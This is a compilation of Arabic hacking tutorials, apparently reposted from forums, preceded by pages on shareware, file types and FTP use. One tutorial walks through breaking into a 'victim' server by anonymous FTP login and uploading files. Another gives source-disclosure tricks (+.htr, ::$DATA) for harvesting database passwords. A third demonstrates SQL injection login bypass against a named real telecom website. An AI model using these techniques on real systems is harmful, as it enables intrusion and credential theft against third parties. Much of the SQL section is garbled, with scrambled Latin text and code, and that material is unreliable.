                                                                      ‫مصادر مشتركة:‪Shareware‬‬

   ‫يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد التتضمن جميع المميزات ويجب تحطيم النسخ بعد‬
                                                                                   ‫انتهاء مدتها.‬




                                               ‫822‬
                                                                               ‫‪FTP‬و الفيروسات :‬

                                         ‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين‬

                                                                                           ‫:‪ASCII‬‬

‫اختصاراً لـ )‪(American Standard Code for Information Interchange‬والملفات من‬
  ‫هذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراو ح قيمتها بين الصفر و 162. ويستخدم هذا المصطلح‬
‫للتعبير عن المعيار الذي يقوم بتحويل األحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع‬
                                                                                         ‫من الصيغ.‬

                                                                                         ‫:‪Binary‬‬

  ‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات ‪ bits‬تتراو ح بين الصفر و 556 وتندرج‬
                                             ‫الصور والبرامج والملفات المضغوطة تحت هذا النوع.‬

‫والفيروسات ال يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما اليمكن أن تنتقل عبر الصور كصيغ & ‪jpg & gif‬‬
‫‪bmp‬وغيرها من امتدادات الصور وال عبر ملفات الفيديو والصوت مثل - 3‪avi - ram - mpg - mp‬‬
 ‫‪wav‬وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة‬
   ‫ماتكون - ‪: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe‬‬
     ‫،‪b64 - bhx‬كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ،‪ MS Office‬لذلك احذر من هذه‬
                                                               ‫الملفات وافحصها دائما ً قبل تشغيلها.‬




                                                                          ‫طريقة نقل الملفات : ‪FTP‬‬

                                                                 ‫هناك طرق عديدة لنقل الملفات وهي:‬

                                                                    ‫نقل الملفات باستخدام نظام‪UNIX‬‬

                                    ‫تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر:‪UNIX‬‬

  ‫:‪ascii‬لنقل ملفات ‪ ASCII‬النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب‬
                                                                                   ‫اعادة األمر.‬

  ‫:‪binary‬لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة‬
                                                                                              ‫األمر.‬

                                ‫:‪status‬لفحص الملف ومعرفة هل هو من نوع ‪ ASCII‬أو.‪Binary‬‬

                                                                 ‫:‪help‬لعرض قائمة بأوامر.‪UNIX‬‬

                                                                         ‫:‪dir‬عرض محتويات الدليل‬

                                                                   ‫:‪ls‬عرض محتويات الدليل الحالي.‬


                                              ‫922‬
                                                                      ‫:‪cd directory‬تغيير الدليل.‬

                                          ‫:‪get filename‬جلب الملف المطلوب وانزاله على جهازك.‬

                                                       ‫:‪mget filename‬جلب مجموعة من الملفات.‬

                                                                         ‫:‪pwd‬طباعة الدليل الحالي.‬

                                                       ‫:‪bye‬انهاء االرتباط والخروج من النظام البعيد.‬

                                                                  ‫نقل الملفات باستخدام حساب:‪Shell‬‬

  ‫أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثالً سوف تدخل‬
‫حسابك في ‪ Tripod‬عن طريق ،‪ Unix Shell‬نكتب أوالً األمر ‪ ftp‬متبوعا ً بالوجهة المرادة فيصبح ‪: ftp‬‬
 ‫‪ftp.tripod.com‬ثم ندخل االسم وهو عل سبيل المثال ،"‪ "IronPrivate‬ثم نقوم بادخال الرقم السري‬
                ‫وهو مثالً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر ‪ Unix‬المعتادة.‬

                                                     ‫وإذا أردت المزيد من المعلومات عن نظام الـ‪Unix‬‬

                                                                        ‫عليك الدخوول الى هذا الموقع:‬

                                         ‫‪http://www.pc-worlds.net/lunexx.html‬‬

                                                                    ‫فهو يفيد المبتدئين فى هذا النظام .‬

                                                           ‫نقل الملفات باستخدام المتصفح:‪Browser‬‬

     ‫نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع ‪ URL‬ويبدأ العنوان‬
     ‫بكلمة ‪ //:ftp‬ثم العنوان بدالً من كلمة ‪ //:http‬للعناوين العادية، بعد الدخول الى موقع الـ ‪FTP‬ستأتي‬
                    ‫الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب النزاله.‬

                                                            ‫نقل الملفات باستخدام حساب:‪SLIP/PPP‬‬

‫أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة .‪ Client Programs‬وأفضل‬
                        ‫برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬هو برنامج.‪Ws_ftp‬‬


                                                               ‫استخدام برنامج :60.5 ‪Ws_ftp LE‬‬

        ‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار ‪Session‬‬
    ‫‪Profile‬والذي من خالله تقوم بتسجيل الدخول، اكتب في خانة ‪ Profile Name‬اسم حساب الدخول؛‬
‫على سبيل المثال ‪ My Home Page In Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي هذا‬
      ‫المثال هو ‪ ftp.tripod.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم بالتدقيق‬
              ‫التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة االسم في خانة ‪ User ID‬وهو مثالً‬
 ‫‪IronPrivate‬ثم الرقم السري في خانة ‪ Password‬وسيظهر مخفيا ً على هيئة نجوم ******, ثم اضغط‬
                                                                         ‫.‪OK‬كما في الشكل التالي:‬




                                               ‫032‬
  ‫بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم األيسر‬
     ‫هو جهاز الكمبيوتر لديك والقسم األيمن هو جهاز الكمبيوتر المضيف، في هذه المرحلة تستطيع جلب أو‬
 ‫ارسال الملفات أو تغيير اسمائها أو حذفها ... الخ. أي تستطيع التحكم في محتويات حسابك على االنترنت أو‬
                                                                          ‫على جهازك بسهولة فائقة.‬

                                                ‫نقل الملفات باستخدام االتصال الشبكي البعيد :‪Telnet‬‬

‫‪Telnet‬هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر‬
 ‫مضيف جاعالً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف.‬
‫اذا كان الجهاز البعيد يستخدم نظام ‪ Windows‬فال مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض‬
                ‫األوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة باألوامر الالزمة.‬



                                                        ‫-استخدام برنامج ‪ Telnet‬من :‪Windows‬‬

  ‫ترفق ‪ Windows‬برنامجا ً سهالً يسمى ‪ Telnet‬يمكنك الدخول عليه بالضغط على قائمة ابدأ ‪ Start‬ثم‬
    ‫تشغيل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة البدء للبرنامج.. من ‪ Connect‬اختر ‪Remote‬‬
   ‫.‪System‬في صندوق الحوار ‪ Connect‬الذي سيظهر لك اكتب في خانة ‪ Host Name‬اسم ملقن‬
    ‫الجهاز المضيف ثم اكتب في خانة ‪ Port‬الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من‬
 ‫الـ ، ‪Term Type‬ان كان لديك واال قم بالتجربة. بعد ذلك اضغط ‪ Connect‬وعندما يتم الربط فستحتاج‬
 ‫الدخال االسم والرقم السري. وبعد االنتهاء من النقل اختر ‪Disconnect‬من قائمة ‪ Connect‬وبعد ذلك‬
                                                                                         ‫اختر .‪Exit‬‬
                                               ‫انتهى،،،‬




                           ‫" اإلختراق عن طريق‪" FTP‬‬

                                                                    ‫<منقول من منتدى مدرسة الهكر>‬


                                               ‫132‬
                                                             ‫<الكاتب: ‪> hacker dz‬‬


                                            ‫اليوم سوف نتناول طريقة إقتحام عبر فتيبي‬
                                                                                ‫‪FTP‬‬
                                ‫أوال و لنجا ح اإلقتحام يجب ان يكون لدى الضحية البور‬
                                                                                   ‫26‬
                                                         ‫مفتو ح و هو البور الخاص ب‬
                                                                                ‫‪FTP‬‬
       ‫و لتأكد من أن البور مفتو ح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها‬
                                                                   ‫‪Superscanne‬‬
                             ‫بعدما تتأكد ان البور مفتو ح ننتقل الى الخطوة الثانية و هي‬
                                                                           ‫إضغط على‬
                                                                               ‫‪Start‬‬
                                                                                    ‫ثم‬
                                                                                ‫‪Run‬‬
                                                                              ‫ثم اكتب‬
                                                                             ‫‪ftp –n‬‬
                                          ‫سوف تطلع لك نافدة في الدوس مكتوب عليها‬
                                                                              ‫‪>FTP‬‬
                                                          ‫ؤوكي لحد هنا كل شيء تمام‬
                                                                        ‫و بعدين اكتب‬
                                                                              ‫‪Open‬‬
                                                                        ‫ثم إضغط على‬
                                                                                 ‫إدخال‬
                                                                              ‫‪Enter‬‬
                                                     ‫سوف تتحصل عب النتيجة التالية‬
                                                                              ‫>‪FTP‬‬
                                                                                  ‫‪To‬‬
                                                                          ‫أكتب بجانب‬
                                                                                  ‫‪To‬‬
                                                ‫رقم اإلبي للضحية ثم إضغط على إدخال‬
                                                                   ‫و اآلن خد بالك معي‬

                              ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬
                          ‫‪Connected to www.assassin.com‬‬
           ‫266 0.4 ‪.)websrv1 Microsoft FTP Service (Version‬‬
                                            ‫و اآلن أكتب الكتابة التالية‬
                                           ‫‪ftp>quote user ftp‬‬
                              ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬
‫233 ‪Anonymous acces allowed, send identify (e-mail name) as‬‬
                                                        ‫.‪password‬‬
                                            ‫و اآلن أكتب الكتابة التالية‬
                                        ‫‪ftp>quote cwd ~root‬‬
                              ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬
                     ‫‪530 Please login with USER and PASS‬‬
                                                 ‫ثم أكتب الكتابة التالية‬
                                          ‫‪ftp>quote pass ftp‬‬
                              ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬
                                                  ‫و نجحت في اإلقتحام‬


                                ‫232‬
                                                         ‫.‪230 Anonymous user logged in‬‬
                                                                    ‫مبروك أنت اآلن في جهاز الضحية‬
                                                                    ‫ما عليك اآلن اال ان تقوم بإستعمال‬
                                                                                         ‫اوامر الفتيبي‬
‫و طبعا لن امر عليها مرور الكرام لكي ال تقعو في المشكلة الي وقعت فيها و هي نجا ح اإلقتحام من دون ما‬
   ‫أعرف و ال فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من 26 دقيقة و انا مجمد اإليدي و‬
                                                       ‫الضحية عالقة من دون أن أعمل أي شيء و لهدا‬
                                          ‫قمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجا ح اإلقتحام‬

                                                                                           ‫‪Pwd‬‬
                                                                   ‫لكي تعر ما يحتويه الهارد ديسك‬
                                                                                             ‫‪Cd‬‬
                                                                                ‫إلقتحام مجلد مثال‬
                                                                                    ‫‪Cd black‬‬
                                                      ‫في هدا المثال قمت بإقتحام مجلد المسمى بالك‬
                                                                                             ‫‪Ls‬‬
                                                       ‫لكي يتضح لك محتوى المجلد أو الهارد ديسك‬
                                                                                            ‫‪Get‬‬
                                                           ‫لكي تحمل الى سطح المكتب بتاع جهازك‬
                                                                                             ‫مثال‬
                                                                              ‫‪Get black.exe‬‬
                                                                                            ‫‪Put‬‬
                                                                                ‫العملية العكسية ل‬
                                                                                            ‫‪Get‬‬
                                          ‫يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في‬
                                                                                ‫في جهاز الضحية‬
                                                                                             ‫مثال‬
                                                                              ‫‪Put black.exe‬‬
                                                                                          ‫‪Clos‬‬
                                                                         ‫لقطع اإلتصال مع الضحية‬


‫هدي أهم األوامر و اآلن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق‬
                                                                    ‫األوام و شرحها و ارقامها‬


                                                  ‫:‪Codes‬‬      ‫:‪Signification‬‬
                                              ‫.‪Restart marker reply‬‬      ‫222‬
                 ‫)‪Service ready in nnn minutes. (nnn est un temps‬‬        ‫262‬
                  ‫.‪Data connection already open; transfer starting‬‬       ‫562‬
                  ‫051‬     ‫.‪File status okay; about to open data connection‬‬
                                                   ‫002‬     ‫.‪Command okay‬‬
              ‫202‬     ‫.‪Command not implemented, superfluous at this site‬‬
                              ‫112‬      ‫.‪System status, or system help reply‬‬
                                                  ‫212‬      ‫.‪Directory status‬‬




                                               ‫332‬
                                                    213      File status.
                                                214     Help message.
                                           215     NAME system type.
                                  220      Service ready for new user.
                          221     Service closing control connection.
             225      Data connection open; no transfer in progress.
                                    226       Closing data connection.
               227     Entering passive mode (h1, h2, h3, h4, p1, p2).
                                     230      User logged in, proceed.
                      250     Requested file action okay, completed.
                                       257      "PATHNAME" created.
                            331     User name okay, need password.
                                      332      Need account for login.
           350      Requested file action pendingfurther information.
           421      Service not available, closing control connection.
                                 425      Can't open data connection.
                        426     Connection closed; transfer aborded.
450     Requested file action not taken. (Fichier déjà utilisé par autre
                                                                  chose)
          451      Requested action aborded: local error processing.
    452     Requested action not taken. (Pas assez de mémoire pour
                                                     exécuter l'action)
                       500     Syntax error, command unrecognized.
                    501     Syntax error in parameters or arguments.
                                 502      Command not implemented.
                                503      Bad sequence of commands.
              504     Command not implemented for that parameter.
                                                 530     Not logged in.
                               532     Need account for storing files.
550     Requested action not taken. (Fichier non trouvé, pas d'accès
                                                            possible,...)
             551     Requested action aborded: page type unknown.
                              552      Requested file action aborded.
    553    Requested action not taken. (Nom de fichier non attribué)



                               ،،،‫انتهى‬




                     " SQL‫" اختراق الـ‬

                                                      >‫<منقول من منتدى الحلم‬
                                                       > linuxray :‫<الكاتب‬



                                234
                                                       ‫س :في البداية ماهي االس كيو ال ( ‪) LQL‬؟؟‬

  ‫االس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬
                                                                     ‫‪ L A‬هي صفحات تسحب بياناتها‬
   ‫من قاعدة ‪ LQL‬وصفحات ‪ AL‬ممكن ان تكون كنز من المعلومات الختراق قواعد بيانات ‪ LQL‬وهذا‬
                                                                    ‫ماسوف اشير اليه الحقا ، و ‪LQL‬‬
                                                                             ‫تتنصت على البورت 33.2‬
 ‫ايضا مااريد ان اخبرك به ان ال ‪ LQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬
                                                                                ‫عدد من الجداول يمكن‬
                            ‫ان تتصور كبرقواعد بيانات ‪ LQL‬والعدد الكبير من البيانات التى تحتويها .‬

                                         ‫س : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ LQL‬؟‬
‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ال اقصد منتديات ‪ H‬بل منتديات ‪ AL‬في الغالب‬
                                                                        ‫سوف تحصل على جميع اسماء‬
     ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصالحيات لم تكن تحلم بها ، اما اذا كان‬
                                                                              ‫الموقع يحتوي على ميزة‬
 ‫قائمة المراسالت فسوف تحصل على اعداد خيالية من االيميالت ، عندها قم بانشاء شركة للدعاية واالعالن‬
                                                        ‫وسوف تصبح ثريا اذن التنسى ‪_LaRxuKiL‬‬
     ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميالد ،‬
                                                                 ‫ممكن ان تصبح ‪. AocaRastAitoA‬‬


                      ‫اعرف انه قد اصابك الملل االن لكن استعد نشاطك من جديد فالطريق مازال طويال ...‬


                                                ‫س : مالذي تحتاجة للدخول على قواعد بيانات ‪ LQL‬؟‬

                                                           ‫تحتاج فقط لل ‪ esUA ricU‬و ‪isswo‬‬

                                               ‫س : من اين احصل على اسم المستخدم وكلمة المرور ؟‬

     ‫هناك طرق عديدة للحصول على ‪ iRo isswo esUA RicU‬منها كما اسلف صفحات ال ‪AL‬‬
                                      ‫وملفات اخرى من نوع *.‪ sqs‬هناك ثغرات كثير يمكن‬
                                       ‫ان تحصل منها على كلمات المرور مثل ثغرة +.‪ptA‬‬
                                                              ‫كيف تستخدم هذه الثغرة :‬


                                                               ‫‪ptA.+ish.hirU/tiArUt//:ptth‬‬
                                                                        ‫‪ : tiArUt‬الموقع الهدف‬
                                                                         ‫‪ : irU‬صفحة ‪ish‬‬
                                                                                ‫+.‪ : ptA‬الثغرة‬


   ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء التحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدة‬
                                                                           ‫اذن منها الفائدة هو‬
   ‫خلف هذه الصفحة البيضاء اذهب الى ‪ eaUw LoxAmU‬لكي ترى اوامر البرمجة الخاصة ب ‪ AL‬التى‬
                                                     ‫اليمكن لك ان تراها في الوضع العادي : مثل‬


                                                                                              ‫<%‬


                                               ‫532‬
                    ‫‪)"ZoRRUmtaoR.AeeeS"(ZAUitUetaUmt.LUArUA =LUt eS‬‬
                                            ‫‪LQL =eKVeEK"ehUR .eS‬‬
      ‫‪eUrUsohUA )K( amAosoct =A ;= We;si=eVe;uuu=LEKeEK;LUArUA‬‬
      ‫‪"2222222" ,"LaRxuKiL_" ,"ots_coU=eAAASALE;uuu=WLVe;Ltxoao‬‬


                                                                                               ‫%>‬
                                  ‫-----------------------------------------------------------------‬
                                         ‫في الكود السابق ترى ان اسم المستخدم هو _‪LaRxuKiL‬‬
                                                                       ‫وكلمة السر هي 2222222‬
                                  ‫-----------------------------------------------------------------‬



                          ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ AL‬مثل االتي :‬

                                  ‫‪'0i22i022'RtacU UAAoA A amAosoct eSLmAaht Ax‬‬

                                                                 ‫‪'ZoRR' :etaUmt AUqxaAUo‬‬

                                                                       ‫/‪5saRU ,aRm.casURicU‬‬

‫هناك ملف ينتهي بامتداد *.‪ aRm‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬
                                                                         ‫المستخدم وكلمة المرور‬
                      ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .‬


                                              ‫وممكن ان ترى مثل هذا االمر في صفحة ‪AL‬‬
                     ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪aRm.oititisU‬‬

                                                ‫<!--# ‪>--"aRm.oititisU" =aRmsxoU casU‬‬


                                              ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬

                                                                               ‫‪isi.rsotis‬‬
                                                                            ‫++‪isi.rsotis‬‬
                                                                 ‫‪isi.rsotis-tUcoAUcasaoR‬‬
                                                                              ‫-‪isi.rsotis‬‬
                                                                               ‫‪sqs.casaoR‬‬
                                                                        ‫‪isi.oaAUmt-rsotis‬‬

      ‫ليس من الضرورة ان تكون الملفات بهذه االسماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪LQL‬‬

                                                  ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل االتي :‬

                                                                             ‫‪ptA.+isi.rsotis‬‬

            ‫هناك ثغرة قديمة في ‪ 3VVL‬وهي ان تضيف بعد صفحة ‪ AL‬هذا الرمز ::$‪ oiti‬كما يلي‬


                                            ‫632‬
                                                                                 ‫‪oiti$::ish.casU‬‬
                              ‫هذه الثغرة التعمل اال على ‪ 3VVL‬فال تتعب نفسك بتطبيقها فقط للعلم ال اكثر .‬


                           ‫لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬

                                                                     ‫بعدها الدخول على قاعدة ال ‪!! LQL‬‬

‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ 2.2easxis aRtUAoUr‬لكني مازلت افضل استخدام‬
                                                          ‫البرنامج السهل ‪6222AZZELL‬‬

                                                        ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬
                                                                                                     ‫‪easU‬‬
                                                                                                      ‫اختر‬
                                                                                                    ‫‪rUw‬‬
                                                                          ‫ومن قائمة الملفات الجديدة اختار‬
                                                                           ‫‪)EuataRr eiti( AoaUmt‬‬
                                                                       ‫اي مشروع قاعدة بيانات موجودة .‬
                                                                      ‫سيظهر لك مربع النشاء الملف اختر‬
                                                                                                 ‫‪ZAUitU‬‬
                                                                                                 ‫اي انشاء‬
                                                                                         ‫االن سترى مربع‬
                                                                            ‫‪eiti LaRr AohUAtaUs‬‬

                         ‫تحتاج فقط لثالث معلومات اسم الموقع او االي بي - اسم المستخدم - كلمة المرور‬

                               ‫2 - ادخل اسم الموقع في صندوق ‪LUsUmt oA URtUA sUArUA RicU‬‬

                                                                   ‫6 - اسم المستخدم في ‪esUA ricU‬‬

                                                                              ‫3 - كلمة السر ‪isswoAo‬‬

                                             ‫مالحظة ( قم بإزالة الصح من مربع ‪)SsiRr isswoAo‬‬

    ‫اضغط في البداية على ‪ AUst ZoRRUmtaoR‬في االسفل الختبار االتصال بقاعدة البيانات اذا رأيت هذه‬
                                                          ‫العبارة ‪AUst ZoRRUmtaoR LxmmUUoUo‬‬
                                                              ‫فمعناه ان االتصال بقاعدة البيانات تم بنجا ح.‬
                             ‫يمكنك االن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :‬
                                                        ‫‪LUsUmt tpU oiti tisU oR tpU sUArUA‬‬
                                                                            ‫واضغط على ‪ eR‬او موافق .‬
                                                ‫انتهى،،،‬




                            ‫" درس مفصل عن الـ‪" SQL‬‬

                                                               ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬
                                                                                ‫<الكاتب: ‪> hish_hish‬‬



                                                  ‫732‬
                        ‫أتجهت غالبية المواقع إلستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه :)‬
                                                      ‫وتستخدم قواعد بيانات فيها كم كبير من المعلومات,‬
                                ‫وعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه ‪ PHP‬أو‪ASP‬‬
                                                 ‫والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات .‬
                                                                 ‫‪SQL Server , MySQL,Oracle‬‬
                                                           ‫يتم أستخالص المعلومات المطلوبه وترك البقيه‬
                                ‫حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون‬
                         ‫أوامر الـ ‪ SQL‬ليتم أستخالص البيانات أو التأكد من صحة بعض المدخالت لبناء‬
                                                            ‫الصفحة المطلوبه أو قبول المستخدم أو رفضه‬
                           ‫دائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ال‬
                                          ‫يقوم به إال من قام صاحب الموقع بإعطائه الصالحيه للقيام بها‬
                                                ‫كأن يقوم بحذف موضوعي :) أو تثبيته في القائمه :))))‬
 ‫حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجوده‬
                                                                                   ‫بجانب أسم المستخدم‬
               ‫حيث يتم أخذ معلومه وتضمينها في أمر الـ ‪ SQL‬الذي يقوم بالتأكد من وجودها وصالحيتها‬
‫ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه‬
                                                                                                    ‫أم ال‬
‫وذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ ‪SQL‬‬
                                                                                                  ‫خاطئ‬
                                                                ‫في بنائه أو القيام بأي أمر غير مسمو ح به‬

                                                   ‫سنتكلم اآلن عن ما يسمى ‪SQL injection‬‬
                              ‫حيث أنه ضعف في كتابة سكربت التوثيق وأيضا بوجود موقع للتجربه‬
                                                           ‫وهو موقع شركة اإلتصاالت السعوديه‬
                                                  ‫عنوان الموقع/‪http://www.stc.com.sa‬‬
                   ‫عند الدخول للصفحة الرئيسيه نجد رابط يختص بمقدمي خدمة أنترنت في السعوديه‬
       ‫وهو 52=‪http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum‬‬
                                         ‫عند دخوله فأنه يطلب منك أسم مستخدم وكلمة مرور !!!!‬
                                   ‫دائما في الحاله هذه أول ما يتبادر لنا هو الـ‪SQL injection‬‬
                                                                                    ‫نقوم بتجربة‬
                                                                               ‫أسم مستخدم : '‬
                                                                                 ‫وكلمة مرور' :‬
                                                                      ‫فنحصل على الخطأ التالي‬
                                                                                          ‫اقتباس :‬




                 ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                         ‫'41‪'80040e‬‬
         ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬
                      ‫.' '' ‪quotation mark before the character string‬‬
                           ‫33 ‪/arabic/Scripts/ar_csd_reply.asp, line‬‬




                                                                    ‫وفي بعض الحاالت يظهر الخطا التالي‬
                                                                                          ‫اقتباس :‬




                                                 ‫832‬
               ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
                                                         ‫'41‪'80040e‬‬
       ‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬
                                                     ‫‪quotation mark‬‬
                   ‫.''=‪before the character string ''' AND Password‬‬
                                         ‫31 ‪/admin/admin.asp, line‬‬




                  ‫وفي الخطأ هذا حصلنا على جزء من أمر الـ ‪ SQL‬وأيضا أسم أحد األعمده في الجدول‬

 ‫وهو ما يؤكد أمكانية عمل ‪ inject‬للـ ‪ SQL Query‬المستخدمه للتحقق صالحية أسم المستخدم وكلمة‬
                                                                                  ‫المرور المدخله .‬
                                             ‫إذن لنتكلم عن الـ ‪ SQL injection‬بشيء من التفصيل‬
    ‫لو كان لدينا سكربت يقوم بالتأكد من صالحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأننا‬
                                                                     ‫سنتحقق منها بالطريقة التاليه‬
                                                                                    ‫:‪code‬‬



             ‫‪SELECT * from Users WHERE User_Name='<field from web‬‬
                      ‫'>‪form>' AND Password='<field from web form‬‬
                                                      ‫{) ‪if( TRUE‬‬
                                                         ‫‪Login OK‬‬
                                                                ‫}‬
                                                           ‫{ ‪else‬‬
                                                      ‫‪Login FAILD‬‬
                                                                ‫}‬


  ‫عند قيام أحد المسمو ح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح له‬
                                                                                         ‫بالدخول‬
                                           ‫فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به‬
                                                                          ‫أسم المستخدم‪: admin‬‬
                                                                       ‫كلمة المرور‪: t0ps3cr3t‬‬
                                                     ‫فإن شكل امر الـ ‪ SQL‬سيصبح بالشكل التالي :‬
                                                                                    ‫:‪code‬‬



                   ‫‪SELECT * from Users WHERE Users_Name='admin' AND‬‬
                                               ‫'‪Password='t0ps3cr3t‬‬


‫وعند وجود سطر في جدول ‪ User‬تحقق فيه الشرط وهو أن يكون اسم المستخدم ‪ admin‬وكلمة المرور‬
                                                                          ‫‪t0ps3cr3t‬‬
                          ‫فأن األمر سيقوم بإرجاع قيمة ‪ TRUE‬أي أن المستخدم مخول بالدخول .‬
                                           ‫غير ذلك سيتم إرجاع ‪ FALSE‬وسيتم رفض الدخول‬

                              ‫مالحظه : يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ. ‪SQL‬‬
         ‫>‪<field from web form‬يحل محلها ما أدخله المستخدم في صفحة التحقق من صالحيته‬



                                             ‫932‬
 ‫في تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ ‪ SQL‬أصبح بالشكل التالي‬
                                                                                                  ‫:‬
                                                                                         ‫:‪code‬‬



          ‫'=‪SELECT * from Users WHERE User_Name=' ' ' AND Password‬‬
                                                               ‫' '‬


                        ‫ونالحظ أننا قمنا بإغالق عالمة التنصيص األولى وبقي عالمة تنصيص لم تغلق بعد‬
                                                               ‫وهو ما أدى لظهور رسالة الخطأ!!‬

                                                       ‫األن نقوم بتجربة اٍم مستخدم1'='1' ‪: blah' OR‬‬
                                                                              ‫ومثلها لكلمة المرور.‬
                                                                          ‫فيصبح شكل أمر الـ‪SQL‬‬
                                                                                         ‫:‪code‬‬



         ‫‪SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND‬‬
                                        ‫'1'='1' ‪Password='blah' OR‬‬


                                                                      ‫لنحلل األمر كل جزء على حدا‬
                                                                    ‫‪SELECT * from Users‬‬
                                                       ‫تعني أختر جميع السطور من الجدول‪Users‬‬
    ‫'1'='1' ‪WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR‬‬
                   ‫في هذا الجزء نقوم بتحديد السطر الذي سنقوم بإختياره وهو الذي تتحقق فيه الشروط‬
                                                                              ‫'1'='1' ‪'blah' OR‬‬
                                           ‫هنا بوجود ‪ OR‬لم تصبح قيمة نصيه ولكن أصبحت شرط‬
              ‫يصبح الشرط صحيح إذا كان طرف واحد على األقل من األطراف المشتركه في الشرط صحيح‬
                                                            ‫وفي حالتنا فإن الطرف األول هو'‪'blah‬‬
                    ‫وهو بدون الخوض في تفاصيل لسنا في صددها االن يعبر عن قيمة صحيحه‪TRUE‬‬
                                                                        ‫والطرف األخر هو '2'='2'‬
                                               ‫يمكنك اإلجابة عن إذا كانت 2 مساويه لـ 2 أم ال !!!!‬
                                        ‫إذا سيكون شكل الشرط بعد تحليله هو‪TRUE OR TRUE‬‬
                                                   ‫وبالتالي فإن النتيجه النهائيه للشرط هي‪TRUE‬‬
